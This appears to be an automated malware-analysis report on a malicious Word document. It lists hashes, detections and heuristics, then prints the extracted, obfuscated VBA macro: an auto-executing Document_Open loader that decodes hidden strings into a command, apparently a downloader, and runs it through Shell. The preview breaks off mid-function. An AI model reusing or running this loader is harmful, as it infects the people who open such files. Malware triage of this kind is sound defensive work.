Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ca6b0f0e6a208f50…

MALICIOUS

Office (OLE)

328.0 KB Created: 2018-04-10 21:17:00 Authoring application: Microsoft Office Word First seen: 2018-04-30
MD5: 735ff3c5d1890ca9c52970fefb2a13b5 SHA-1: d2409bf86846d3b78fb92ebfdefe5ea1c07a0783 SHA-256: ca6b0f0e6a208f506b109e77842a3b6673472e3d1496f2f30adb87298107cd6d
252 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample is a Microsoft Office document containing heavily obfuscated VBA macros. The 'Document_Open' macro is present and configured to execute code, indicated by critical heuristic firings for 'Potential Shell call in VBA' and 'Obfuscated auto-exec VBA loader'. The presence of 'macros.bas' and the ClamAV detection name 'Doc.Malware.Chronos-6897935-0' further support its malicious nature. The script's obfuscation and use of `Shell` indicate it's likely a downloader for a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            ElseIf GkLj = 3360 Then
                Shell (StrReverse(StrReverse(GXbK))), 0
            axPeyx = StrReverse("pwzrDoeuZzscmIyllS")
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
            ElseIf GkLj = 3360 Then
                Shell (StrReverse(StrReverse(GXbK))), 0
            axPeyx = StrReverse("pwzrDoeuZzscmIyllS")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    drScMeM = Replace("OykHXkkdeoisLKcVh", "OykH", "CIGL")
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21691 bytes
SHA-256: 12a33bf1eb375370f5c4c625626c050b50e3ac910e32d438d93e11a4950a8e25
Detection
ClamAV: No threats found
Obfuscation or payload: likely
395 of 511 identifiers look randomly generated (e.g. 'XPodevrgSkEYlIBGAaSRPsqG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
drScMeM = Replace("OykHXkkdeoisLKcVh", "OykH", "CIGL")
    Do While UebuY < 97
        tMuv = Replace("TQwuXwziFsYZCFIiGuW", "TQw", "QSYR")
        tMuv = Replace("dXQvOxTfkWOLApHpQiK", "dXQv", "FjGOt")
        tMuv = Replace("BJwnnuzhUX", "BJw", "oALU")
        tMuv = StrReverse("ORMkjOgBCrkKj")
        tMuv = StrReverse("ZOBESfHEgTC")
        tMuv = "wlLcGCGrKc"
        tMuv = "YMRYQeyO"
        tMuv = "esphHjpwcPms"
        tMuv = "rkOCcAJO"
        tMuv = "aeIqQxzCf"
        tMuv = Replace("VOrhmmLpUcZx", "VOrh", "yXGj")
        tMuv = StrReverse("rBhwzLmcDdmJjCy")
        tMuv = Replace("fmRUfSplYQ", "fmRU", "MvDFnQH")
        tMuv = Replace("LVIHpnIGsuSbKPzDq", "LVI", "IUXwRT")
        tMuv = StrReverse("EFQxgYOpmIwofdYlo")
        tMuv = StrReverse("WgfpRmblgdvJH")
        tMuv = Replace("aOiiVWeEWRdR", "aOi", "wzIzwnE")
        tMuv = StrReverse("crYsDLGSFlOhttCdR")
        tMuv = Replace("IOMzcXXTDw", "IOMz", "iTygfq")
        tMuv = StrReverse("uaeOwYAiRWgKMR")
        tMuv = Replace("TQaiVAwgCXPRlvx", "TQa", "KmSek")
        tMuv = "qQabVL"
        tMuv = "PszGRlGQ"
        tMuv = Replace("nQrAjGwwaZkrZEUPF", "nQrA", "YMcI")
        tMuv = Replace("xXrQzUogrVGFn", "xXr", "nOWRbo")
    UebuY = UebuY + 1
    Loop
    For HhfRH = 0 To 293
        Xjmy = "iIXBJcQ"
        Xjmy = "dEealrsJn"
        Xjmy = "vptxrQxGP"
        Xjmy = StrReverse("uWXPtfPYgzYpVMx")
        Xjmy = StrReverse("TOYTtydfaSfE")
        Xjmy = StrReverse("rILTEOzgWVvKIg")
        Xjmy = StrReverse("shhDcFZBblnJb")
        Xjmy = Replace("AqjVPfPhoVTyTsq", "Aqj", "uDjG")
        Xjmy = Replace("cbPqhLFYdnrzAR", "cbP", "JeSGsu")
        Xjmy = StrReverse("qRbvatofFTTnBem")
        Xjmy = "rHvLzguM"
        Xjmy = "zAGLSyx"
        Xjmy = Replace("DJwtlUZLfWTQCYZcV", "DJwt", "lEolj")
        Xjmy = Replace("LGQmmGTbLHgcYanosWC", "LGQ", "KZtj")
        Xjmy = Replace("sgflOZbgyTUJHU", "sgf", "azvr")
        Xjmy = StrReverse("ZSAqYOHmjsv")
        Xjmy = Replace("zcpAMVaruYJlqTwm", "zcp", "Mzxnr")
        Xjmy = Replace("OiOvSIAAso", "OiOv", "YuklD")
        Xjmy = Replace("iRfETiEZXvDy", "iRfE", "ZGxI")
        Xjmy = "iDuwPX"
        Xjmy = Replace("zFgoiKleSjwSXn", "zFgo", "YvfnKuJ")
        Xjmy = StrReverse("JdOztISxnJUz")
        Xjmy = Replace("nnEipLOlBcgD", "nnE", "WWOH")
        Xjmy = "ILcDWBstL"
        Xjmy = Replace("wRlFfEbxtlLs", "wRlF", "ctvkATL")
    Next HhfRH
    Do While DKMsA < 338
        jtat = Replace("EWPnmOmOfskYi", "EWP", "bOzL")
        jtat = StrReverse("KTjFqeMxgofozo")
        jtat = StrReverse("yjlpPvFUZFypcj")
        jtat = Replace("MbrJDgZWfeLqZ", "MbrJ", "QMtleW")
        jtat = StrReverse("wifdQCSRFDkFcyDzXL")
        jtat = StrReverse("HfiycAEBzJ")
        jtat = Replace("aPgIspBorAqD", "aPg", "eWDvW")
        jtat = StrReverse("cGvEUSUIQAK")
        jtat = "CufVAvL"
        jtat = "RQbxTJHZfvoRD"
        jtat = Replace("YfwseYlBbxccCeXEHTO", "Yfws", "Tpah")
        jtat = StrReverse("QvGJnqGfigxi")
        jtat = StrReverse("ducHOraFjrrXGco")
        jtat = StrReverse("GGbGxxdhsPzSrFszVH")
        jtat = StrReverse("bImzTyHlua")
        jtat = Replace("ftbaDbJXBuesnqfrmt", "ftba", "uDXmC")
        jtat = "qglpEnAnEvA"
        jtat = Replace("pWVFiqRrTsU", "pWVF", "rDVF")
        jtat = Replace("pQMXjqQVyFJXOdI", "pQM", "CViynC")
        jtat = "FourdJ"
        jtat = Replace("gqlfptycnR", "gql", "iikqc")
        jtat = StrReverse("qJGMyjfWaQuv")
        jtat = StrReverse("cPhsUeEkhMwHpLSzDOQ")
        jtat = Replace("XJJljBmCvKKODtlUPu", "XJJl", "DnYB")
        jtat = StrReverse("fbixRKUBOMTQUoKdozh")
    DKMsA = DKMsA + 1
    Loop
mjrexq = StrReverse("ezOjTnonMoQzkmJpaH")
tDXAnH = StrReverse("trrUUUdXPzjxgzX")
kiikcuR = StrReverse("dTxbcMwLLvwVUw")
PvpqKoZ = Replace("mXREZqSwayqBfw", "mXRE", "lVDbvgn")
cWgEaKo = StrReverse("coFvrnVezvWFdcTJCD")
VuqreB = StrReverse("VlrAnBHCHhswyzacAJi")
    Do While CXCXl < 139
        VZhx = StrReverse("cKHbUuTqhwbx")
        VZhx = Replace("IzhVFbeEasu", "Izh", "BePH")
        VZhx = StrReverse("DzJkBTVOxlFSXYZTy")
        VZhx = Replace("CotGTWslHO", "CotG", "RXcDr")
        VZhx = "zqphJBzvIojlC"
        VZhx = StrReverse("aQrnTcfdCrspIQ")
        VZhx = "KWxQgwythig"
        VZhx = "QDenFKroP"
        VZhx = Replace("bguCVSCnGVDdmk", "bgu", "jyfR")
        VZhx = "tdcQvwGt"
        VZhx = StrReverse("FmPrbRKXMAJYiVzWUr")
        VZhx = Replace("uBGTxdfmByka", "uBGT", "OccDR")
        VZhx = StrReverse("bBzGISQXXriqMtQhOq")
        VZhx = Replace("YSqEJZulIvMEhZpEVHm", "YSq", "JWAvw")
        VZhx = Replace("krnchPcqzfC", "krnc", "fVeIIUE")
        VZhx = Replace("ELYvKqjvuJvSFP", "ELY", "jvKHg")
        VZhx = StrReverse("dpnbjKnZOZuTJh")
        VZhx = Replace("JsWRhUCtcZDmlZIl", "JsW", "CEUj")
        VZhx = StrReverse("AvDwsaQREp")
        VZhx = Replace("ImJLuVRRIXMhZMhxOk", "ImJL", "tJWLi")
        VZhx = StrReverse("hgvAohCZbTqdaEMOn")
        VZhx = StrReverse("FPaQJhErnbMGwkQpo")
        VZhx = "zABVrQxAJ"
        VZhx = StrReverse("llOqsLPLZbzXPpqiX")
        VZhx = Replace("PoFWXkOmLdfBlc", "PoF", "BmayfEB")
    CXCXl = CXCXl + 1
    Loop

    While GkLj < 3386
        If GkLj = 28 Then
            TmiPY = TmiPY & lwdPKrR(-1, "YnNpVbRVtKccaOhvSro@xvT`TeiACiUoKHAdC`XPodevrgSkEYlIBGAaSRPsqG@`GUJtynVEAqHyWmqjY`HCIbJVBASYfYGw")
        ElseIf GkLj = 2782 Then
            yEmE = Replace("qFOpwhwPlX", "qFO", "QwVLS")
        WqxZqJ = Replace("thLOonlmmJWsrBCO", "thLO", "ZbJC")
        WqxZqJ = Replace("LmnMrWZUdZy", "Lmn", "HrBmQb")
        ElseIf GkLj = 2316 Then
            yEmE = Replace("pWGcuSDHlp", "pWG", "IzPOB")
        pupoAW = StrReverse("dIMAnZuvcqxKEi")
        pupoAW = StrReverse("FBmhrYjCuYcCx")
        ElseIf GkLj = 378 Then
            yEmE = Replace("FDbDQbeMnQ", "FDb", "KjLqd")
        ZJojVw = "pbzpgtVwXZnAp"
        ZJojVw = Replace("KFeVvUDYICoyymon", "KFeV", "BEZmCMw")
        ElseIf GkLj = 521 Then
            yEmE = Replace("mISJgDmAQs", "mIS", "BPqaa")
        APLBKP = StrReverse("cJYxOmwwjKnQo")
        APLBKP = Replace("IDReATDzDkvOKlt", "IDR", "wJwcQpY")
        ElseIf GkLj = 2723 Then
            yEmE = Replace("yvjxqItTTB", "yvj", "ifJPW")
        YWAVTG = StrReverse("gfAtbsadoLz")
        YWAVTG = Replace("xKhOjhUxKnJsYesvf", "xKh", "lryv")
        ElseIf GkLj = 1042 Then
            yEmE = Replace("sjXwGVtstH", "sjX", "fhbcv")
        JRfcKp = StrReverse("XwDzFPudBG")
        JRfcKp = "xsJOYnjWh"
        ElseIf GkLj = 3209 Then
            cEdO = Split(Replace(TmiPY, "ehOGp", "ttc"), Chr(121 + 3))(0)
        Tfxzrw = StrReverse("lMTYetgWYeGK")
        Tfxzrw = StrReverse("XRdQnnunBkYoBgpiahM")
        ElseIf GkLj = 2211 Then
            yEmE = Replace("wDleZeshcK", "wDl", "yGfrO")
        tdXjym = Replace("oXCsWWbFlryPDXlRW", "oXCs", "rLhEiRo")
        tdXjym = StrReverse("ogpMhLyBOc")
        ElseIf GkLj = 284 Then
            yEmE = Replace("DWECoOTcjg", "DWE", "pbfHG")
        SfGhIM = Replace("jCQHITuRbZx", "jCQH", "RiuI")
        SfGhIM = StrReverse("sJKEspQWbW")
        ElseIf GkLj = 2895 Then
            yEmE = Replace("LZHBljnHtZ", "LZH", "cLwpl")
        UkhKwp = Replace("oSZwREiYsuvSoqtGRns", "oSZw", "ykFAL")
        UkhKwp = Replace("LLaoDTkMWbumzMPCRY", "LLa", "dQYDyM")
        ElseIf GkLj = 1800 Then
            yEmE = Replace("cXlbllAyjW", "cXl", "HnnIO")
        SrwgZP = Replace("VBrqwuwYqPgTzAi", "VBr", "ptCGY")
        SrwgZP = Replace("KlcmPZBVuYmarFsL", "Klc", "zKIG")
        ElseIf GkLj = 2052 Then
            yEmE = Replace("dBOQFjuHCv", "dBO", "tnhIb")
        IvvVjS = Replace("iwsnGuWxhzJGKqfI", "iwsn", "bYjUGtH")
        IvvVjS = Replace("IdqgYAlbmeUIQvV", "Idqg", "cCrdmy")
        ElseIf GkLj = 1645 Then
            yEmE = Replace("vTtQObbaCI", "vTt", "frSRQ")
        dsTksL = Replace("oeVkzWvlasOZvtkf", "oeV", "kznK")
        dsTksL = StrReverse("WWsgeErSSQDHEbhdpp")
        ElseIf GkLj = 1309 Then
            yEmE = Replace("sJlidGizOc", "sJl", "ygCsg")
        YKAZUD = Replace("hJSmhoOHXCe", "hJSm", "MxiYFm")
        YKAZUD = StrReverse("QUrqyAgfrWzmRUXPhv")
        ElseIf GkLj = 2603 Then
            yEmE = Replace("edTapxDlbU", "edT", "txsHI")
        QQazLG = "nyTXrRdPMJbH"
        QQazLG = Replace("tRoKROQuypbZzeLyiBj", "tRo", "ntrUf")
        ElseIf GkLj = 2876 Then
            yEmE = Replace("PEScYSTRwr", "PES", "Bhxba")
        POVqCV = StrReverse("UlffJEPXBoxjZVavwum")
        POVqCV = Replace("vslksQYeuXKr", "vslk", "wMpl")
        ElseIf GkLj = 678 Then
            yEmE = Replace("vaEruJIkmx", "vaE", "mdcOE")
        xlmHDX = StrReverse("IupAqrjcva")
        xlmHDX = "wDugsZ"
        ElseIf GkLj = 2833 Then
            yEmE = Replace("RysCVxOuSz", "Rys", "LrgjW")
        GDZUcQ = Replace("hlJkeFBCzZuQlBPSCK", "hlJ", "SYotc")
        GDZUcQ = Replace("FiPtQGhnrQOOMeFrc", "FiPt", "UrmWIgO")
        ElseIf GkLj = 1908 Then
            yEmE = Replace("RZtfGTOkmp", "RZt", "YlIfH")
        tkJrmz = Replace("fydqmfFWpREpehCI", "fydq", "byeqK")
        tkJrmz = StrReverse("dwkPaGmWSzSZdy")
        ElseIf GkLj = 1146 Then
            yEmE = Replace("cXYcBWxRGK", "cXY", "GckHK")
        uHTgyi = "EPYDXBFiLW"
        uHTgyi = "MgtEPid"
        ElseIf GkLj = 103 Then
            TmiPY = TmiPY & lwdPKrR(-1, "dBij{:(&dwd-Xhfq[&*('gs`OoldSsdF99\gs`O-NH-ldsrxRZ' gs`odkhE, rrdbnqO,sq`sR 0 v, dwd-kkdgrqdvno:((")
        AcFGSd = StrReverse("kkByviOSZMuy")
        AcFGSd = Replace("lBbrZHKuGk", "lBbr", "rdwrpI")
        ElseIf GkLj = 1764 Then
            yEmE = Replace("ZksBQsVmsi", "Zks", "OdUsK")
        GWdXzs = StrReverse("yWboPcokAfLwZ")
        GWdXzs = "HcjvpFqryPrbG"
        ElseIf GkLj = 260 Then
            TmiPY = TmiPY & lwdPKrR(-1, "dkhEc`nkmvnC-(smdhkBadV-sdM-ldsrxR sbdiaN,vdM' 0 v, dwd-kkdgrqdvno{JByAm{pEal")
        BdBScw = StrReverse("SDTvztGJVFCKusSam")
        BdBScw = "jHWtVD"
        ElseIf GkLj = 2166 Then
            yEmE = Replace("DdLTKZyvMM", "DdL", "yhCny")
        EhWMiT = Replace("ntdtSvcIRyEOO", "ntdt", "TDVuZ")
        EhWMiT = "lXQwITaJCJ"
        ElseIf GkLj = 3300 Then
            GXbK = Replace(Twql, cEdO, Chr(44 + 2))
        kbMqeD = Replace("bDyfkXrrlL", "bDyf", "OngYte")
        kbMqeD = Replace("xmZEFlfPFdOv", "xmZ", "EkSFBFe")
        ElseIf GkLj = 1458 Then
            yEmE = Replace("seeQTqoaDT", "see", "ivewe")
        YPFLKc = Replace("UrzoHxTMciRJzFAhU", "Urz", "ewSMj")
        YPFLKc = StrReverse("IutWGFCynf")
        ElseIf GkLj = 2410 Then
            yEmE = Replace("VBCuRuwYOU", "VBC", "mMtIz")
        ELvLsb = StrReverse("CnnQWKRRTQPdjmOo")
        ELvLsb = Replace("ZKFPwryFys", "ZKF", "jqazy")
        ElseIf GkLj = 758 Then
            yEmE = Replace("FEeOabtaRP", "FEe", "pudys")
        EFyTkm = Replace("YlsqFSDETKmPYGYwHQm", "Ylsq", "owCAjEV")
        EFyTkm = Replace("UPloZOKKalx", "UPlo", "udAegI")
        ElseIf GkLj = 957 Then
            yEmE = Replace("IVAkFkXwzG", "IVA", "BAncE")
        RxWXsO = StrReverse("lAftuOEdbXsbGfxruXb")
        RxWXsO = StrReverse("DrfLfakHCpaCSMmKXVJ")
        ElseIf GkLj = 619 Then
            yEmE = Replace("LTwzGlwPpK", "LTw", "oBJah")
        FeOSVb = StrReverse("aGHkgOzZJUMTYlKpOc")
        FeOSVb = StrReverse("RfgobFGOZmlQUVlfmM")
        ElseIf GkLj = 1016 Then
            yEmE = Replace("PgltvJBtRd", "Pgl", "vEyxY")
        YnhSRU = StrReverse("FbAStBiJziQnV")
        YnhSRU = Replace("hSYoSLhXCRDXfE", "hSYo", "GRCbp")
        ElseIf GkLj = 1374 Then
            yEmE = Replace("iEfqigKOGm", "iEf", "yCDaU")
        HRvwhX = Replace("KMTAOSMSpavjnidf", "KMTA", "PJqj")
        HRvwhX = StrReverse("cvJlyZuIbR")
        ElseIf GkLj = 1510 Then
            yEmE = Replace("DfZucmbgAU", "DfZ", "fuVgn")
        yOaejZ = "LGASWUyiqz"
        yOaejZ = "exgePsB"
        ElseIf GkLj = 1748 Then
            yEmE = Replace("YurTitsmpi", "Yur", "pzKXb")
        nviIgY = StrReverse("kVqbdbqkcRQxooyLh")
        nviIgY = StrReverse("bMIWiRxXeprXKK")
        ElseIf GkLj = 2696 Then
            yEmE = Replace("EKzlDtPhyO", "EKz", "YgFtY")
        tUUrUf = StrReverse("ndhhQsypIsxsnR")
        tUUrUf = StrReverse("HsIsYdvUxiYBfWjE")
        ElseIf GkLj = 474 Then
            yEmE = Replace("ZdrGGUvEnl", "Zdr", "tpaYA")
        woJJSD = Replace("hHRUorVRYJVJ", "hHR", "FyWB")
        woJJSD = StrReverse("lFzMDJqBMYFk")
        ElseIf GkLj = 1707 Then
            yEmE = Replace("AZdrDGhqaX", "AZd", "CyDoc")
        jxTstO = "GgqdaYkdvJPjI"
        jxTstO = Replace("CAnRlZfqiCobLD", "CAnR", "CbnqmC")
        ElseIf GkLj = 2111 Then
            yEmE = Replace("hxXReWfUKd", "hxX", "GEznk")
        mqJzcl = Replace("yRMVqTmFZQsfcmifCD", "yRMV", "Enfrr")
        mqJzcl = Replace("mKcbJtaJyjA", "mKc", "WebkGWn")
        ElseIf GkLj = 1563 Then
            yEmE = Replace("RZOfGQCJRQ", "RZO", "Sxewo")
        rkVEKz = StrReverse("ValenskeJX")
        rkVEKz = StrReverse("JevrlaLhykbxUwW")
        ElseIf GkLj = 849 Then
            yEmE = Replace("CdbixcJzgQ", "Cdb", "CiKCU")
        DynBjx = "aAEYMS"
        DynBjx = StrReverse("RympRPXVDyJas")
        ElseIf GkLj = 2976 Then
            yEmE = Replace("RQTrnnkfym", "RQT", "bxZDv")
        AiiJIb = StrReverse("vsafxHpQXXJ")
        AiiJIb = StrReverse("WemSXJQrnEGOLfXXPIZ")
        ElseIf GkLj = 1547 Then
            yEmE = Replace("EHVEtVYnHd", "EHV", "MmBDJ")
        nyQDIJ = StrReverse("THRqAGVALGKBRtio")
        nyQDIJ = Replace("okvoUZFWxxdjwhGZHIc", "okv", "IxVY")
        ElseIf GkLj = 3266 Then
            Twql = Replace(dfFy, nBzCK, Chr(104) + Chr(116) + Chr(116) + Chr(112))
        PhfaPq = StrReverse("cQFdjowPVjDJTx")
        PhfaPq = Replace("AprzgqEZyIbIjxpZ", "Apr", "leuE")
        ElseIf GkLj = 3065 Then
            TmiPY = Replace(StrReverse(TmiPY), "AlBiT", "Phg")
        YqVXnx = StrReverse("zWKaTyqWwQnzL")
        YqVXnx = "nRukMzsRuguOp"
        ElseIf GkLj = 3076 Then
            dfFy = Split(Replace(TmiPY, "TBmBr", "vaI"), Chr(122 + 2))(3 - 1)
        byWaSZ = Replace("CBGBWxHOwplr", "CBGB", "VCnLYr")
        byWaSZ = Replace("nWXnSRJsKQhikPoirC", "nWX", "qJXxSve")
        ElseIf GkLj = 1277 Then
            yEmE = Replace("dbRWBYgWvB", "dbR", "vTRlz")
        GpQoBa = "seAAEdHDST"
        GpQoBa = Replace("BMDpruTqXAggTd", "BMDp", "oxbgD")
        ElseIf GkLj = 1228 Then
            yEmE = Replace("fZzcPTdqWk", "fZz", "WosmQ")
        dTgqma = Replace("qClaHSoLnPzucLEmTFL", "qCla", "BUdt")
        dTgqma = StrReverse("rXklGQbLzILCu")
        ElseIf GkLj = 3360 Then
            Shell (StrReverse(StrReverse(GXbK))), 0
        axPeyx = StrReverse("pwzrDoeuZzscmIyllS")
        axPeyx = Replace("vFodGTLzGqGgSKnR", "vFo", "Lapt")
        ElseIf GkLj = 1978 Then
            yEmE = Replace("FhdearJVts", "Fhd", "XVLri")
        DJHtrv = StrReverse("rcULRZlAHS")
        DJHtrv = StrReverse("iWGPKSTLhkj")
        ElseIf GkLj = 1834 Then
            yEmE = Replace("HXTyyTFBZj", "HXT", "CHylU")
        kvoJjV = "Ceezkx"
        kvoJjV = StrReverse("WBeQBUlslayYxg")
        ElseIf GkLj = 2201 Then
            yEmE = Replace("fuVTysudwE", "fuV", "JDwsT")
        Ytufbk = "qpuIsmMDTpo"
        Ytufbk = StrReverse("RCZKUynZQUtURAbgyk")
        ElseIf GkLj = 1418 Then
            yEmE = Replace("AMFWrLDJJJ", "AMF", "ubDtC")
        ZVmVEB = StrReverse("omMXufmPSWHaVdSY")
        ZVmVEB = Replace("cTQfmHWOKFK", "cTQf", "HIuP")
        ElseIf GkLj = 2129 Then
            yEmE = Replace("xBsDMWYtaZ", "xBs", "LZbjh")
        KGvrEd = Replace("dieyMzvwojmCdjwBOW", "diey", "LukWTi")
        KGvrEd = StrReverse("VgSoxQWAXqCoahnBVUJ")
        ElseIf GkLj = 3122 Then
            nBzCK = Split(Replace(TmiPY, "MsECy", "Gmg"), Chr(123 + 1))(3 - 2)
        nGAZIP = Replace("eigqDDfVJJyRgUwJn", "eigq", "MApzVgZ")
        nGAZIP = StrReverse("JhJbADEIWtzuLo")
        ElseIf GkLj = 2508 Then
            yEmE = Replace("lQliQnxVxB", "lQl", "swApQ")
        bCYmeF = Replace("oUnFrXRGTRan", "oUnF", "RLYTI")
        bCYmeF = StrReverse("fnJnPvCCAZcJjDfTtB")
        ElseIf GkLj = 2944 Then
            yEmE = Replace("qRfQIKfsoz", "qRf", "yivLU")
        TprQso = StrReverse("hVHPWGglqsFr")
        TprQso = "Pthkft"
        ElseIf GkLj = 392 Then
            yEmE = Replace("BqiGsmLPBg", "Bqi", "PoVve")
        fMPcPe = Replace("bQXZplqRTxBhviHkkCI", "bQXZ", "UcIzSZ")
        fMPcPe = Replace("tbZVBLZQQvGK", "tbZ", "AfAUXde")
        ElseIf GkLj = 151 Then
            TmiPY = TmiPY & lwdPKrR(-1, "&dwd-Xhfq[&*('gs`OoldSsdF99\gs`O-NH-ldsrxRZ'+&fmo-IVr2v.nh-jhmjds-t..9rossg&'")
        twMHuK = StrReverse("JiYRktdPbeQsVBpd")
        twMHuK = Replace("BDWpcVFqBLo", "BDW", "PcAMjUG")
        ElseIf GkLj = 449 Then
            yEmE = Replace("jGwLalzcrg", "jGw", "TbtSB")
        FpVowv = "enhfbd"
        FpVowv = StrReverse("yBiQBTfhXdVyFnsihSY")
        ElseIf GkLj = 319 Then
            yEmE = Replace("wnhiLIohjH", "wnh", "JeLfY")
        ppuUrX = "LZGVxYxYStxTu"
        ppuUrX = Replace("LIIxkaKrXMk", "LIIx", "wSDS")
        End If
        GkLj = GkLj + 1
Wend

    For gtOjt = 0 To 360
        CIoJ = StrReverse("JpPwXgZkjDmHEVZ")
        CIoJ = "YiHAXnK"
        CIoJ = StrReverse("dBmAHnwQitrad")
        CIoJ = Replace("xIrusIjMxH", "xIr", "aVEGF")
        CIoJ = "gQhXHLkU"
        CIoJ = StrReverse("TFdXqDXQqzkQgQk")
        CIoJ = Replace("wGlWTrHpICtrT", "wGlW", "UGWuiTp")
        CIoJ = StrReverse("aIEeSZZabLHjABXl")
        CIoJ = StrReverse("BqDXijJnpqoxVHrelZj")
        CIoJ = Replace("jvdZlHkBSskwd", "jvdZ", "dmoHo")
        CIoJ = "DcjdVa"
        CIoJ = "ZxVaXIPouljn"
        CIoJ = "EEmReMf"
        CIoJ = "sLGeWpOGj"
        CIoJ = Replace("lRVoIxKWoIU", "lRV", "PvLER")
        CIoJ = Replace("yYlElbqSWYf", "yYl", "MSRMLS")
        CIoJ = StrReverse("IohJwywgnFujt")
        CIoJ = StrReverse("CDJBDYxrEWDlRRUUhYM")
        CIoJ = StrReverse("YuOuunekhxrox")
        CIoJ = Replace("qfCyweaBCfrDWZ", "qfC", "fdcoQQA")
        CIoJ = Replace("HblkUSnviG", "Hbl", "OhdY")
        CIoJ = "cJlZxzkkfsZpp"
        CIoJ = Replace("bdZrkEiHrwR", "bdZr", "OJiSpf")
        CIoJ = Replace("nUgyUbszaKSysJXGTKn", "nUgy", "KDOXqxn")
        CIoJ = "kxkvMwmFet"
    Next gtOjt
    Do While yopSE < 391
        ITjp = StrReverse("ptwyuETjfkUs")
        ITjp = "OqYBuCsydtlu"
        ITjp = Replace("BpDXLzCgoPXX", "BpDX", "XYTEH")
        ITjp = Replace("LOcWMqfhyaOwgHlM", "LOc", "UEXtC")
        ITjp = StrReverse("JVZHgsmFhyJH")
        ITjp = StrReverse("LGviaOHiAwcrKxl")
        ITjp = "bIfnXeLY"
        ITjp = "qDoagpz"
        ITjp = StrReverse("IrnMUlLAyn")
        ITjp = "RTdkCPgrMR"
        ITjp = StrReverse("SgrSMpEEtCZWDJoQCvV")
        ITjp = Replace("lvfynmTqacnUOuL", "lvf", "LBnczg")
        ITjp = "rIvytxxVFqtA"
        ITjp = "PzErfcmCYO"
        ITjp = "dYWkbdRocxF"
        ITjp = StrReverse("wJXeeSTeUYVZyHcwInP")
        ITjp = Replace("VofcMMxzzVxeiVzFr", "Vofc", "cTfR")
        ITjp = StrReverse("lTfQkLnQujThujPQUEC")
        ITjp = Replace("XwVPnLkDzoDl", "XwVP", "MKuue")
        ITjp = Replace("aYYwkaVcEkADXyYgxEr", "aYYw", "sdTWYmi")
        ITjp = Replace("pSquhBDyEYEsnQzfg", "pSqu", "Cituy")
        ITjp = StrReverse("EywSTZhKFulcrxh")
        ITjp = Replace("uBqRjMVaiyLvdAj", "uBq", "knZdGHL")
        ITjp = "FsMEkDRvjERR"
        ITjp = "WMgZlyGGTLLU"
    yopSE = yopSE + 1
    Loop

End Sub
Public Function lwdPKrR(sPfSW, jU) As String
    Do While orOuB < 223
        FWJu = StrReverse("kFJMgYItxlAcmABlQR")
        FWJu = Replace("RWByHHlpayBAOqA", "RWBy", "zndtchi")
        FWJu = Replace("botuzbrPHGMoUrYh", "bot", "XtVRygv")
        FWJu = Replace("FnBBOZbwnV", "FnBB", "MDVy")
        FWJu = Replace("USzWOesOxVgv", "USz", "akcsfsY")
        FWJu = "isWeazS"
        FWJu = "ueFERV"
        FWJu = "EhapVsPbs"
        FWJu = Replace("vxWfRddwinaVEaIl", "vxWf", "kIhb")
        FWJu = Replace("cHKuYsQTtFWdR", "cHKu", "GIBR")
        FWJu = StrReverse("okmyAbqDUVqnWfy")
        FWJu = StrReverse("roExDkcitfiohQEhwj")
        FWJu = Replace("slQlyQPXmDtwE", "slQl", "tBwDXJ")
        FWJu = StrReverse("dmxYwSpTaxXGszlB")
        FWJu = Replace("nUWLsScyeKxkGlxMPeI", "nUWL", "qWBXgj")
        FWJu = "XRMdzKWltu"
        FWJu = StrReverse("RtCpavzSmgPskjcT")
        FWJu = StrReverse("IFlfmuGXKoZ")
        FWJu = Replace("IEWrnAJEQUqJ", "IEWr", "FqdEIo")
        FWJu = StrReverse("VqdbQCTWAjJvgI")
        FWJu = Replace("URXitFmVpqSHqnJjIEs", "URXi", "vKury")
        FWJu = StrReverse("pDIKUlBZdYHzX")
        FWJu = StrReverse("ybuzaEIjqPoiguJJ")
        FWJu = StrReverse("odnwleWJGaDTzQgH")
        FWJu = Replace("jlTSccvObsxCZAC", "jlT", "IZok")
    orOuB = orOuB + 1
    Loop
    Dim FbyM() As Byte
    FbyM = StrConv(jU, vbFromUnicode)
    While WaKr <= UBound(FbyM)
        CmHWM = Replace("lmgSUmJAPV", "lmg", "lraWG")
        CmHWM = Replace("mqXUTggwal", "mqX", "LzZcZ")
        FbyM(WaKr) = FbyM(WaKr) - sPfSW
        WaKr = WaKr + 1
